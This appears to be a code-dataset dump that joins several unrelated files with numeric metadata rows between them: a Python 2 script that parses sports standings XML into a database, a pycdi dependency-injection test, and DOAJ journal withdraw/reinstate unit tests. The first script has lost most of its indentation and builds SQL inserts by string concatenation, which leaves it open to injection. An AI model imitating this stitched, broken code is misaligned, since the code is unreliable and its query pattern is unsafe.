self.type = ''
self.num = attrs.get('place')
self.num2 = ''
elif name == 'ranking':
self.group = name
self.type = ''
self.num = attrs.get('ranking')
self.num2 = ''
elif name == 'points-for' or name == 'points-against':
self.group = name
self.type = attrs.get('type')
self.num = attrs.get('number')
self.num2 = ''
elif name == 'sos':
self.group = name
self.type = ''
self.num = attrs.get('rank')
self.num2 = attrs.get('sos')
elif name == 'rpi':
self.group = name
self.type = ''
self.num = attrs.get('rank')
self.num2 = attrs.get('rpi')
elif name == 'win-loss-record':
self.group = name
self.type = attrs.get('type')
self.num = attrs.get('wins')
self.num2 = attrs.get('losses')
elif name == 'streak':
self.group = name
self.type = attrs.get('kind')
self.num = attrs.get('games')
self.num2 = ''
return
def endElement(self, name):
if name == 'season':
self.isSeason = False
elif name == 'cbk-team-standings':
self.isTeam = False
data = str.join(',', self.insertdata)
insert_standings(c, data)
elif name == 'team-code':
self.isTeamCode = False
elif name == 'wins' or name == 'losses' \
or name == 'winning-percentage' \
or name == 'place' \
or name == 'ranking' \
or name == 'points-for' or name == 'points-against' \
or name == 'rpi' or name == 'sos' \
or name == 'win-loss-record' \
or name == 'streak':
if self.team_id > 0:
self.id = int(find_value_in_array4args(self.stands, self.group, self.type, self.name) or 0)
self.insertdata.append("("
+ str(self.id) +
",'"
+ str(self.group) +
"','"
+ str(self.type) +
"','"
+ str(self.name) +
"','"
+ str(self.num) +
"','"
+ str(self.num2) +
"','"
+ str(self.num3) +
"','"
+ str(self.num4) +
"',"
+ str(self.team_id) +
",'"
+ str(self.season) +
"','"
+ str(self.global_id) +
"')")
class WCBKHandler(ContentHandler):
def __init__(self):
self.id = 0
self.team_id = 0
self.global_id = 0
self.group = ''
self.type = ''
self.name = ''
self.num = ''
self.num2 = ''
self.num3 = ''
self.num4 = ''
self.season = ''
self.insertdata = []
self.teams = []
self.stands = []
self.isSeason = False
self.isTeam = False
self.isTeamCode = False
def startElement(self, name, attrs):
if name == 'season':
self.isSeason = True
self.season = attrs.get('season')
self.teams = get_teams(c, '129')
elif name == 'wcbk-team-standings':
self.isTeam = True
self.insertdata = []
elif name == 'team-code':
self.global_id = attrs.get('global-id')
self.team_id = int(find_value_in_array2args(self.teams, self.global_id) or 0)
self.stands = get_stands(c, self.team_id, self.season)
elif name == 'wins' or name == 'losses':
self.group = name
self.type = ''
self.num = attrs.get('number')
self.num2 = ''
elif name == 'winning-percentage':
self.group = name
self.type = ''
self.num = attrs.get('percentage')
self.num2 = ''
elif name == 'place':
self.group = name
self.type = ''
self.num = attrs.get('place')
self.num2 = ''
elif name == 'ranking':
self.group = name
self.type = ''
self.num = attrs.get('ranking')
self.num2 = ''
elif name == 'points-for' or name == 'points-against':
self.group = name
self.type = attrs.get('type')
self.num = attrs.get('number')
self.num2 = ''
elif name == 'sos':
self.group = name
self.type = ''
self.num = attrs.get('rank')
self.num2 = attrs.get('sos')
elif name == 'rpi':
self.group = name
self.type = ''
self.num = attrs.get('rank')
self.num2 = attrs.get('rpi')
elif name == 'win-loss-record':
self.group = name
self.type = attrs.get('type')
self.num = attrs.get('wins')
self.num2 = attrs.get('losses')
elif name == 'streak':
self.group = name
self.type = attrs.get('kind')
self.num = attrs.get('games')
self.num2 = ''
return
def endElement(self, name):
if name == 'season':
self.isSeason = False
elif name == 'wcbk-team-standings':
self.isTeam = False
data = str.join(',', self.insertdata)
insert_standings(c, data)
elif name == 'team-code':
self.isTeamCode = False
elif name == 'wins' or name == 'losses' \
or name == 'winning-percentage' \
or name == 'place' \
or name == 'ranking' \
or name == 'points-for' or name == 'points-against' \
or name == 'rpi' or name == 'sos' \
or name == 'win-loss-record' \
or name == 'streak':
if self.team_id > 0:
self.id = int(find_value_in_array4args(self.stands, self.group, self.type, self.name) or 0)
self.insertdata.append("("
+ str(self.id) +
",'"
+ str(self.group) +
"','"
+ str(self.type) +
"','"
+ str(self.name) +
"','"
+ str(self.num) +
"','"
+ str(self.num2) +
"','"
+ str(self.num3) +
"','"
+ str(self.num4) +
"',"
+ str(self.team_id) +
",'"
+ str(self.season) +
"','"
+ str(self.global_id) +
"')")
class NFLHandler(ContentHandler):
def __init__(self):
self.id = 0
self.team_id = 0
self.global_id = 0
self.group = ''
self.type = ''
self.name = ''
self.num = ''
self.num2 = ''
self.num3 = ''
self.num4 = ''
self.season = ''
self.insertdata = []
self.teams = []
self.stands = []
self.isSeason = False
self.isTeam = False
self.isTeamCode = False
def startElement(self, name, attrs):
if name == 'season':
self.isSeason = True
self.season = attrs.get('season')
self.teams = get_teams(c, '3')
elif name == 'football-nfl-team-standings':
self.isTeam = True
self.insertdata = []
elif name == 'team-code':
self.global_id = attrs.get('global-id')
self.team_id = int(find_value_in_array2args(self.teams, self.global_id) or 0)
self.stands = get_stands(c, self.team_id, self.season)
elif name in ['wins', 'losses', 'ties', 'points-for', 'points-against', 'games-back', 'wc-games-back']:
self.group = name
self.type = ''
self.name = ''
self.num = attrs.get('number')
self.num2 = ''
self.num3 = ''
self.num4 = ''
elif name == 'winning-percentage':
self.group = name
self.type = ''
self.name = ''
self.num = attrs.get('percentage')
self.num2 = ''
self.num3 = ''
self.num4 = ''
elif name == 'place':
self.group = name
self.type = ''
self.name = ''
self.num = attrs.get('place')
self.num2 = ''
self.num3 = ''
self.num4 = ''
elif name == 'win-loss-record':
self.group = name
self.type = attrs.get('type')
self.name = attrs.get('name')
self.num = attrs.get('wins')
self.num2 = attrs.get('losses')
self.num3 = attrs.get('ties')
self.num4 = ''
elif name == 'streak':
self.group = name
self.type = attrs.get('kind')
self.name = ''
self.num = attrs.get('games')
self.num2 = ''
self.num3 = ''
self.num4 = ''
elif name == 'eliminated-from-playoffs':
self.group = name
self.type = ''
self.name = ''
self.num = attrs.get('eliminated')
self.num2 = ''
self.num3 = ''
self.num4 = ''
return
def endElement(self, name):
if name == 'season':
self.isSeason = False
elif name == 'football-nfl-team-standings':
self.isTeam = False
data = str.join(',', self.insertdata)
insert_standings(c, data)
elif name == 'team-code':
self.isTeamCode = False
elif name in ['wins', 'losses', 'ties', 'points-for', 'points-against', 'games-back', 'wc-games-back',
'winning-percentage', 'place', 'win-loss-record', 'streak', 'eliminated-from-playoffs']:
if self.team_id > 0:
self.id = int(find_value_in_array4args(self.stands, self.group, self.type, self.name) or 0)
self.insertdata.append("("
+ str(self.id) +
",'"
+ str(self.group) +
"','"
+ str(self.type) +
"','"
+ str(self.name) +
"','"
+ str(self.num) +
"','"
+ str(self.num2) +
"','"
+ str(self.num3) +
"','"
+ str(self.num4) +
"',"
+ str(self.team_id) +
",'"
+ str(self.season) +
"','"
+ str(self.global_id) +
"')")
class CFBHandler(ContentHandler):
def __init__(self):
self.id = 0
self.team_id = 0
self.global_id = 0
self.group = ''
self.type = ''
self.name = ''
self.num = ''
self.num2 = ''
self.num3 = ''
self.num4 = ''
self.season = ''
self.insertdata = []
self.teams = []
self.stands = []
self.isSeason = False
self.isTeam = False
self.isTeamCode = False
def startElement(self, name, attrs):
if name == 'season':
self.isSeason = True
self.season = attrs.get('season')
self.teams = get_teams(c, '130')
elif name == 'cfb-team-standings':
self.isTeam = True
self.insertdata = []
elif name == 'team-code':
self.global_id = attrs.get('global-id')
self.team_id = int(find_value_in_array2args(self.teams, self.global_id) or 0)
self.stands = get_stands(c, self.team_id, self.season)
elif name in ['wins', 'losses']:
self.group = name
self.type = ''
self.num = attrs.get('number')
self.num2 = ''
self.num3 = ''
self.num4 = ''
elif name == 'winning-percentage':
self.group = name
self.type = ''
self.num = attrs.get('percentage')
self.num2 = ''
self.num3 = ''
self.num4 = ''
elif name == 'ranking':
self.group = name
self.type = ''
self.num = attrs.get('ranking')
self.num2 = ''
self.num3 = ''
self.num4 = ''
elif name == 'place':
self.group = name
self.type = ''
self.num = attrs.get('place')
self.num2 = ''
self.num3 = ''
self.num4 = ''
elif name == 'points-for' or name == 'points-against':
self.group = name
self.type = attrs.get('type')
self.num = attrs.get('number')
self.num2 = ''
self.num3 = ''
self.num4 = ''
elif name == 'win-loss-record':
self.group = name
self.type = attrs.get('type')
self.num = attrs.get('wins')
self.num2 = attrs.get('losses')
self.num3 = attrs.get('percentage')
self.num4 = ''
elif name == 'streak':
self.group = name
self.type = attrs.get('kind')
self.num = attrs.get('games')
self.num2 = ''
self.num3 = ''
self.num4 = ''
return
def endElement(self, name):
if name == 'season':
self.isSeason = False
elif name == 'cfb-team-standings':
self.isTeam = False
data = str.join(',', self.insertdata)
insert_standings(c, data)
elif name == 'team-code':
self.isTeamCode = False
        elif name in ['wins', 'losses', 'winning-percentage', 'place', 'ranking', 'points-for', 'points-against',
                      'win-loss-record', 'streak']:
if self.team_id > 0:
self.id = int(find_value_in_array4args(self.stands, self.group, self.type, self.name) or 0)
self.insertdata.append("("
+ str(self.id) +
",'"
+ str(self.group) +
"','"
+ str(self.type) +
"','"
+ str(self.name) +
"','"
+ str(self.num) +
"','"
+ str(self.num2) +
"','"
+ str(self.num3) +
"','"
+ str(self.num4) +
"',"
+ str(self.team_id) +
",'"
+ str(self.season) +
"','"
+ str(self.global_id) +
"')")
class MLBHandler(ContentHandler):
def __init__(self):
self.id = 0
self.team_id = 0
self.global_id = 0
self.group = ''
self.type = ''
self.name = ''
self.num = ''
self.num2 = ''
self.num3 = ''
self.num4 = ''
self.season = ''
self.insertdata = []
self.teams = []
self.stands = []
self.isSeason = False
self.isTeam = False
self.isTeamCode = False
def startElement(self, name, attrs):
if name == 'season':
self.isSeason = True
self.season = attrs.get('season')
self.teams = get_teams(c, '5')
elif name == 'baseball-mlb-team-standings':
self.isTeam = True
self.insertdata = []
elif name == 'team-code':
self.global_id = attrs.get('global-id')
self.team_id = int(find_value_in_array2args(self.teams, self.global_id) or 0)
self.stands = get_stands(c, self.team_id, self.season)
elif name in ['wins', 'losses', 'games-back', 'wc-games-back']:
self.group = name
self.type = ''
self.name = ''
self.num = attrs.get('number')
self.num2 = ''
elif name == 'winning-percentage':
self.group = name
self.type = ''
self.name = ''
self.num = attrs.get('percentage')
self.num2 = ''
elif name == 'division-rank':
self.group = name
self.type = 'rank'
self.name = ''
self.num = attrs.get('rank')
self.num2 = ''
elif name == 'win-loss-record':
self.group = name
self.type = attrs.get('type')
self.name = attrs.get('name')
self.num = attrs.get('wins')
self.num2 = attrs.get('losses')
elif name == 'streak':
self.group = name
self.type = attrs.get('kind')
self.name = ''
self.num = attrs.get('games')
self.num2 = ''
elif name == 'eliminated-from-playoffs':
self.group = name
self.type = ''
self.name = ''
self.num = attrs.get('eliminated')
self.num2 = ''
return
def endElement(self, name):
if name == 'season':
self.isSeason = False
elif name == 'baseball-mlb-team-standings':
self.isTeam = False
data = str.join(',', self.insertdata)
insert_standings(c, data)
elif name == 'team-code':
self.isTeamCode = False
elif name in ['wins', 'losses', 'games-back', 'wc-games-back', 'winning-percentage', 'division-rank',
'win-loss-record', 'streak', 'eliminated-from-playoffs']:
if self.team_id > 0:
self.id = int(find_value_in_array4args(self.stands, self.group, self.type, self.name) or 0)
self.insertdata.append("("
+ str(self.id) +
",'"
+ str(self.group) +
"','"
+ str(self.type) +
"','"
+ str(self.name) +
"','"
+ str(self.num) +
"','"
+ str(self.num2) +
"','"
+ str(self.num3) +
"','"
+ str(self.num4) +
"',"
+ str(self.team_id) +
",'"
+ str(self.season) +
"','"
+ str(self.global_id) +
"')")
class NHLHandler(ContentHandler):
def __init__(self):
self.id = 0
self.team_id = 0
self.global_id = 0
self.group = ''
self.type = ''
self.name = ''
self.num = ''
self.num2 = ''
self.num3 = ''
self.num4 = ''
self.season = ''
self.insertdata = []
self.teams = []
self.stands = []
self.isSeason = False
self.isTeam = False
self.isTeamCode = False
def startElement(self, name, attrs):
if name == 'season':
self.isSeason = True
self.season = attrs.get('season')
self.teams = get_teams(c, '4')
elif name == 'hockey-nhl-team-standings':
self.isTeam = True
self.insertdata = []
elif name == 'team-code':
self.global_id = attrs.get('global-id')
self.team_id = int(find_value_in_array2args(self.teams, self.global_id) or 0)
self.stands = get_stands(c, self.team_id, self.season)
elif name in ['wins', 'losses', 'ties', 'overtime-losses', 'shootout-losses', 'team-points']:
self.group = name
self.type = ''
self.name = ''
self.num = attrs.get('number')
self.num2 = ''
self.num3 = ''
self.num4 = ''
elif name == 'winning-percentage':
self.group = name
self.type = ''
self.name = ''
self.num = attrs.get('percentage')
self.num2 = ''
self.num3 = ''
self.num4 = ''
elif name == 'place':
self.group = name
self.type = ''
self.name = ''
self.num = attrs.get('place')
self.num2 = ''
self.num3 = ''
self.num4 = ''
elif name == 'win-loss-record':
self.group = name
self.type = attrs.get('type')
self.name = attrs.get('name')
self.num = attrs.get('wins')
self.num2 = attrs.get('losses')
self.num3 = attrs.get('overtime-losses')
self.num4 = attrs.get('shootout-losses')
elif name == 'streak':
self.group = name
self.type = attrs.get('kind')
self.name = ''
self.num = attrs.get('games')
self.num2 = ''
self.num3 = ''
self.num4 = ''
elif name in ['goals-for', 'goals-against']:
self.group = name
self.type = ''
self.name = ''
self.num = attrs.get('goals')
self.num2 = ''
self.num3 = ''
self.num4 = ''
return
def endElement(self, name):
if name == 'season':
self.isSeason = False
elif name == 'hockey-nhl-team-standings':
self.isTeam = False
data = str.join(',', self.insertdata)
insert_standings(c, data)
elif name == 'team-code':
self.isTeamCode = False
elif name in ['wins', 'losses', 'ties', 'overtime-losses', 'shootout-losses', 'team-points',
'winning-percentage', 'place', 'win-loss-record', 'streak', 'goals-for', 'goals-against']:
if self.team_id > 0:
self.id = int(find_value_in_array4args(self.stands, self.group, self.type, self.name) or 0)
self.insertdata.append("("
+ str(self.id) +
",'"
+ str(self.group) +
"','"
+ str(self.type) +
"','"
+ str(self.name) +
"','"
+ str(self.num) +
"','"
+ str(self.num2) +
"','"
+ str(self.num3) +
"','"
+ str(self.num4) +
"',"
+ str(self.team_id) +
",'"
+ str(self.season) +
"','"
+ str(self.global_id) +
"')")
class MLSHandler(ContentHandler):
def __init__(self):
self.id = 0
self.team_id = 0
self.global_id = 0
self.group = ''
self.type = ''
self.name = ''
self.num = ''
self.num2 = ''
self.num3 = ''
self.num4 = ''
self.season = ''
self.league = ''
self.insertdata = []
self.teams = []
self.stands = []
self.isSeason = False
self.isTeam = False
self.isTeamCode = False
def startElement(self, name, attrs):
if name == 'league':
self.league = attrs.get('alias')
elif name == 'season':
self.isSeason = True
self.season = attrs.get('year')
for live in schedule_files:
if live[2] == self.league.lower():
self.teams = get_teams(c, str(live[0]))
elif name == 'ifb-team-standings':
self.isTeam = True
self.insertdata = []
elif name == 'team-info':
self.global_id = attrs.get('global-id')
self.team_id = int(find_value_in_array2args(self.teams, self.global_id) or 0)
self.stands = get_stands(c, self.team_id, self.season)
elif name in ['wins', 'losses', 'ties']:
self.group = name
self.type = ''
self.name = ''
self.num = attrs.get('number')
self.num2 = ''
self.num3 = ''
self.num4 = ''
elif name == 'winning-percentage':
self.group = name
self.type = ''
self.name = ''
self.num = attrs.get('percentage')
self.num2 = ''
self.num3 = ''
self.num4 = ''
elif name == 'place':
self.group = name
self.type = ''
self.name = ''
self.num = attrs.get('place')
self.num2 = ''
self.num3 = ''
self.num4 = ''
elif name == 'games-played':
self.group = name
self.type = ''
self.name = ''
self.num = attrs.get('games')
self.num2 = ''
self.num3 = ''
self.num4 = ''
elif name == 'points':
self.group = name
self.type = 'points'
self.name = ''
self.num = attrs.get('points')
self.num2 = attrs.get('points-per-game')
self.num3 = attrs.get('penalty-points')
self.num4 = ''
elif name == 'win-loss-record':
self.group = name
self.type = attrs.get('type')
self.name = attrs.get('name')
self.num = attrs.get('wins')
self.num2 = attrs.get('losses')
self.num3 = attrs.get('goals')
self.num4 = attrs.get('goals-against')
elif name == 'streak':
self.group = name
self.type = attrs.get('kind')
self.name = ''
self.num = attrs.get('games')
self.num2 = ''
self.num3 = ''
self.num4 = ''
elif name in ['goals-for', 'goals-against']:
self.group = name
self.type = ''
self.name = ''
self.num = attrs.get('goals')
self.num2 = ''
self.num3 = ''
self.num4 = ''
return
def endElement(self, name):
if name == 'season':
self.isSeason = False
elif name == 'ifb-team-standings':
self.isTeam = False
data = str.join(',', self.insertdata)
insert_standings(c, data)
elif name == 'team-info':
self.isTeamCode = False
elif name in ['wins', 'losses', 'ties', 'points', 'winning-percentage', 'place', 'win-loss-record', 'streak',
'goals-for', 'goals-against', 'games-played']:
if self.team_id > 0:
self.id = int(find_value_in_array4args(self.stands, self.group, self.type, self.name) or 0)
self.insertdata.append("("
+ str(self.id) +
",'"
+ str(self.group) +
"','"
+ str(self.type) +
"','"
+ str(self.name) +
"','"
+ str(self.num) +
"','"
+ str(self.num2) +
"','"
+ str(self.num3) +
"','"
+ str(self.num4) +
"',"
+ str(self.team_id) +
",'"
+ str(self.season) +
"','"
+ str(self.global_id) +
"')")
if __name__ == "__main__":
if os.access(os.path.expanduser("~/.lockfile.standing.lock"), os.F_OK):
# if the lockfile is already there then check the PID number
# in the lock file
pidfile = open(os.path.expanduser("~/.lockfile.standing.lock"), "r")
pidfile.seek(0)
old_pid = pidfile.readline()
# Now we check the PID from lock file matches to the current
# process PID
if os.path.exists("/proc/%s" % old_pid):
print "You already have an instance of the program running"
print "It is running as process %s," % old_pid
sys.exit(1)
else:
print "File is there but the program is not running"
print "Removing lock file for the: %s as it can be there because of the program last time it was run" % old_pid
os.remove(os.path.expanduser("~/.lockfile.standing.lock"))
else:
pidfile = open(os.path.expanduser("~/.lockfile.standing.lock"), "w")
pidfile.write("%s" % os.getpid())
        pidfile.close()
try:
cc = db_open()
c = cc[0]
conn = cc[1]
parser = make_parser()
curHandler = NBAHandler()
parser.setContentHandler(curHandler)
parser.parse(open(path + "NBA_TEAM_STANDINGS.XML"))
curHandler = WNBAHandler()
parser.setContentHandler(curHandler)
parser.parse(open(path + "WNBA_TEAM_STANDINGS.XML"))
curHandler = CBKHandler()
parser.setContentHandler(curHandler)
parser.parse(open(path + "CBK_TEAM_STANDINGS.XML"))
curHandler = WCBKHandler()
parser.setContentHandler(curHandler)
parser.parse(open(path + "WCBK_TEAM_STANDINGS.XML"))
curHandler = MLBHandler()
parser.setContentHandler(curHandler)
parser.parse(open(path + "MLB_TEAM_STANDINGS.XML"))
curHandler = NFLHandler()
parser.setContentHandler(curHandler)
parser.parse(open(path + "NFL_TEAM_STANDINGS.XML"))
curHandler = CFBHandler()
parser.setContentHandler(curHandler)
parser.parse(open(path + "CFB_TEAM_STANDINGS.XML"))
curHandler = NHLHandler()
parser.setContentHandler(curHandler)
parser.parse(open(path + "NHL_TEAM_STANDINGS.XML"))
curHandler = MLSHandler()
parser.setContentHandler(curHandler)
parser.parse(open(path + "BUND_TEAM_STANDINGS.XML"))
curHandler = MLSHandler()
parser.setContentHandler(curHandler)
parser.parse(open(path + "FRAN_TEAM_STANDINGS.XML"))
curHandler = MLSHandler()
parser.setContentHandler(curHandler)
parser.parse(open(path + "EPL_TEAM_STANDINGS.XML"))
curHandler = MLSHandler()
parser.setContentHandler(curHandler)
parser.parse(open(path + "CHLG_TEAM_STANDINGS.XML"))
curHandler = MLSHandler()
parser.setContentHandler(curHandler)
parser.parse(open(path + "FMF_TEAM_STANDINGS.XML"))
curHandler = MLSHandler()
parser.setContentHandler(curHandler)
parser.parse(open(path + "SERI_TEAM_STANDINGS.XML"))
curHandler = MLSHandler()
parser.setContentHandler(curHandler)
parser.parse(open(path + "LIGA_TEAM_STANDINGS.XML"))
curHandler = MLSHandler()
parser.setContentHandler(curHandler)
parser.parse(open(path + "MLS_TEAM_STANDINGS.XML"))
db_close(c, conn)
os.remove(os.path.expanduser("~/.lockfile.standing.lock"))
    except Exception:
        if debug:
            print(traceback.format_exc())
else:
send_mail("standings", traceback.format_exc())
os.remove(os.path.expanduser("~/.lockfile.standing.lock"))
sys.exit(1)
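The eight handler classes above differ mainly in the league id passed to get_teams() and the name of their standings element; a hypothetical base-class sketch of the shared branches (same module-level c cursor and helper functions as above):

class BaseStandingsHandler(ContentHandler):
    LEAGUE_ID = '2'                       # e.g. NBAHandler uses get_teams(c, '2')
    STANDINGS_TAG = 'nba-team-standings'  # per-league standings element name

    def startElement(self, name, attrs):
        if name == 'season':
            self.season = attrs.get('season')
            self.teams = get_teams(c, self.LEAGUE_ID)
        elif name == self.STANDINGS_TAG:
            self.insertdata = []
        elif name == 'team-code':
            self.global_id = attrs.get('global-id')
            self.team_id = int(find_value_in_array2args(self.teams, self.global_id) or 0)
            self.stands = get_stands(c, self.team_id, self.season)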
| 37.674817
| 139
| 0.407749
| 4,139
| 46,227
| 4.489007
| 0.053395
| 0.057266
| 0.047578
| 0.062217
| 0.906889
| 0.90436
| 0.900431
| 0.868622
| 0.85183
| 0.848708
| 0
| 0.01116
| 0.466957
| 46,227
| 1,226
| 140
| 37.705546
| 0.742868
| 0.00411
| 0
| 0.901213
| 0
| 0.000867
| 0.099976
| 0.021442
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.006932
| null | null | 0.005199
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
f9c95e79e1411a0e94aacd9b43d54d7f84345662
| 2,309
|
py
|
Python
|
tests/common/test_inheritance.py
|
cesartalves/python-cdi
|
a5a13b5e0ad6a5255e686ecd934d4606a9c2a1f2
|
[
"BSD-3-Clause"
] | 10
|
2017-02-02T19:23:12.000Z
|
2020-11-18T05:37:10.000Z
|
tests/common/test_inheritance.py
|
cesartalves/python-cdi
|
a5a13b5e0ad6a5255e686ecd934d4606a9c2a1f2
|
[
"BSD-3-Clause"
] | 34
|
2017-07-29T21:03:20.000Z
|
2021-07-01T13:35:31.000Z
|
tests/common/test_inheritance.py
|
cesartalves/python-cdi
|
a5a13b5e0ad6a5255e686ecd934d4606a9c2a1f2
|
[
"BSD-3-Clause"
] | 1
|
2019-06-05T14:45:36.000Z
|
2019-06-05T14:45:36.000Z
|
# -*- encoding: utf-8 -*-
from tests import TestCase
from pycdi import Inject
from pycdi.core import DEFAULT_CONTAINER
class InheritanceTest(TestCase):
def test_inheritance(self):
test_case = self
DEFAULT_CONTAINER.register_instance('inheritance', str)
DEFAULT_CONTAINER.register_instance({}, dict)
DEFAULT_CONTAINER.register_instance([], list)
@Inject(str, some_object=object)
class A(object):
def __init__(self, some_str, some_object):
test_case.assertIsInstance(some_str, str)
test_case.assertIsInstance(some_object, object)
@Inject(some_object=object, some_dict=dict)
class B(A):
def __init__(self, some_str, some_object, some_dict):
test_case.assertIsInstance(some_str, str)
test_case.assertIsInstance(some_object, object)
test_case.assertIsInstance(some_dict, dict)
@Inject(some_object=object, some_list=list)
class C(A):
def __init__(self, some_str, some_object, some_list):
test_case.assertIsInstance(some_str, str)
test_case.assertIsInstance(some_object, object)
test_case.assertIsInstance(some_list, list)
DEFAULT_CONTAINER.call(A)
DEFAULT_CONTAINER.call(B)
DEFAULT_CONTAINER.call(C)
def test_inheritance_with_override(self):
test_case = self
DEFAULT_CONTAINER.register_instance('inheritance', str)
DEFAULT_CONTAINER.register_instance({}, dict)
DEFAULT_CONTAINER.register_instance([], list)
@Inject(str, some_object=object)
class A(object):
def __init__(self, some_str, some_object):
test_case.assertIsInstance(some_str, str)
test_case.assertIsInstance(some_object, object)
@Inject(some_dict=dict, _override=True)
class B(A):
def __init__(self, some_dict):
test_case.assertIsInstance(some_dict, dict)
@Inject(some_list=list, _override=True)
class C(A):
def __init__(self, some_list):
test_case.assertIsInstance(some_list, list)
DEFAULT_CONTAINER.call(A)
DEFAULT_CONTAINER.call(B)
DEFAULT_CONTAINER.call(C)
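A minimal usage sketch distilled from the tests above: register an instance for a type, inject it positionally, and let the container construct the class:

from pycdi import Inject
from pycdi.core import DEFAULT_CONTAINER

DEFAULT_CONTAINER.register_instance('hello', str)

@Inject(str)
class Greeter(object):
    def __init__(self, some_str):
        print(some_str)  # prints 'hello'

DEFAULT_CONTAINER.call(Greeter)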
| 35.523077
| 65
| 0.646167
| 260
| 2,309
| 5.373077
| 0.134615
| 0.080172
| 0.206156
| 0.240515
| 0.840372
| 0.817466
| 0.806013
| 0.765927
| 0.720115
| 0.67287
| 0
| 0.000589
| 0.26505
| 2,309
| 64
| 66
| 36.078125
| 0.822628
| 0.009961
| 0
| 0.72
| 0
| 0
| 0.009632
| 0
| 0
| 0
| 0
| 0
| 0.24
| 1
| 0.16
| false
| 0
| 0.06
| 0
| 0.36
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
f9db2572f22c2a2616ce6f149546ef25f86dc4f8
| 4,655
|
py
|
Python
|
doajtest/unit/test_withdraw_reinstate.py
|
glauberm/doaj
|
dc24dfcbf4a9f02ce5c9b09b611a5766ea5742f7
|
[
"Apache-2.0"
] | 47
|
2015-04-24T13:13:39.000Z
|
2022-03-06T03:22:42.000Z
|
doajtest/unit/test_withdraw_reinstate.py
|
glauberm/doaj
|
dc24dfcbf4a9f02ce5c9b09b611a5766ea5742f7
|
[
"Apache-2.0"
] | 1,215
|
2015-01-02T14:29:38.000Z
|
2022-03-28T14:19:13.000Z
|
doajtest/unit/test_withdraw_reinstate.py
|
glauberm/doaj
|
dc24dfcbf4a9f02ce5c9b09b611a5766ea5742f7
|
[
"Apache-2.0"
] | 14
|
2015-11-27T13:01:23.000Z
|
2021-05-21T07:57:23.000Z
|
from doajtest.helpers import DoajTestCase
from doajtest.fixtures import JournalFixtureFactory, ArticleFixtureFactory
from portality import models
from portality.tasks.journal_in_out_doaj import SetInDOAJBackgroundTask, change_in_doaj
import time
class TestWithdrawReinstate(DoajTestCase):
def setUp(self):
super(TestWithdrawReinstate, self).setUp()
def tearDown(self):
super(TestWithdrawReinstate, self).tearDown()
def test_01_withdraw_task(self):
sources = JournalFixtureFactory.make_many_journal_sources(10, in_doaj=True)
ids = []
articles = []
for source in sources:
j = models.Journal(**source)
j.save()
ids.append(j.id)
pissn = j.bibjson().get_identifiers(j.bibjson().P_ISSN)
eissn = j.bibjson().get_identifiers(j.bibjson().E_ISSN)
asource = ArticleFixtureFactory.make_article_source(pissn=pissn[0], eissn=eissn[0], with_id=False)
a = models.Article(**asource)
a.save()
articles.append(a.id)
time.sleep(2)
job = SetInDOAJBackgroundTask.prepare("testuser", journal_ids=ids, in_doaj=False)
SetInDOAJBackgroundTask.submit(job)
time.sleep(2)
for id in ids:
j = models.Journal.pull(id)
assert j.is_in_doaj() is False
for id in articles:
a = models.Article.pull(id)
assert a.is_in_doaj() is False
def test_02_reinstate_task(self):
sources = JournalFixtureFactory.make_many_journal_sources(10, in_doaj=False)
ids = []
articles = []
for source in sources:
j = models.Journal(**source)
j.save()
ids.append(j.id)
pissn = j.bibjson().get_identifiers(j.bibjson().P_ISSN)
eissn = j.bibjson().get_identifiers(j.bibjson().E_ISSN)
asource = ArticleFixtureFactory.make_article_source(pissn=pissn[0], eissn=eissn[0], with_id=False, in_doaj=False)
a = models.Article(**asource)
a.save()
articles.append(a.id)
time.sleep(2)
job = SetInDOAJBackgroundTask.prepare("testuser", journal_ids=ids, in_doaj=True)
SetInDOAJBackgroundTask.submit(job)
time.sleep(2)
for id in ids:
j = models.Journal.pull(id)
assert j.is_in_doaj() is True
for id in articles:
a = models.Article.pull(id)
assert a.is_in_doaj() is True
def test_03_withdraw(self):
acc = models.Account()
acc.set_name("testuser")
ctx = self._make_and_push_test_context(acc=acc)
sources = JournalFixtureFactory.make_many_journal_sources(10, in_doaj=True)
ids = []
articles = []
for source in sources:
j = models.Journal(**source)
j.save()
ids.append(j.id)
pissn = j.bibjson().get_identifiers(j.bibjson().P_ISSN)
eissn = j.bibjson().get_identifiers(j.bibjson().E_ISSN)
asource = ArticleFixtureFactory.make_article_source(pissn=pissn[0], eissn=eissn[0], with_id=False)
a = models.Article(**asource)
a.save()
articles.append(a.id)
time.sleep(2)
change_in_doaj(ids, False)
time.sleep(2)
for id in ids:
j = models.Journal.pull(id)
assert j.is_in_doaj() is False
for id in articles:
a = models.Article.pull(id)
assert a.is_in_doaj() is False
ctx.pop()
def test_04_reinstate(self):
acc = models.Account()
acc.set_name("testuser")
ctx = self._make_and_push_test_context(acc=acc)
sources = JournalFixtureFactory.make_many_journal_sources(10, in_doaj=False)
ids = []
articles = []
for source in sources:
j = models.Journal(**source)
j.save()
ids.append(j.id)
pissn = j.bibjson().get_identifiers(j.bibjson().P_ISSN)
eissn = j.bibjson().get_identifiers(j.bibjson().E_ISSN)
asource = ArticleFixtureFactory.make_article_source(pissn=pissn[0], eissn=eissn[0], with_id=False, in_doaj=False)
a = models.Article(**asource)
a.save()
articles.append(a.id)
time.sleep(2)
change_in_doaj(ids, True)
time.sleep(2)
for id in ids:
j = models.Journal.pull(id)
assert j.is_in_doaj() is True
for id in articles:
a = models.Article.pull(id)
assert a.is_in_doaj() is True
ctx.pop()
| 31.241611
| 125
| 0.596778
| 570
| 4,655
| 4.703509
| 0.136842
| 0.042521
| 0.041775
| 0.065647
| 0.831033
| 0.831033
| 0.831033
| 0.831033
| 0.831033
| 0.831033
| 0
| 0.009759
| 0.295596
| 4,655
| 149
| 126
| 31.241611
| 0.807868
| 0
| 0
| 0.839286
| 0
| 0
| 0.006873
| 0
| 0
| 0
| 0
| 0
| 0.071429
| 1
| 0.053571
| false
| 0
| 0.044643
| 0
| 0.107143
| 0
| 0
| 0
| 0
| null | 0
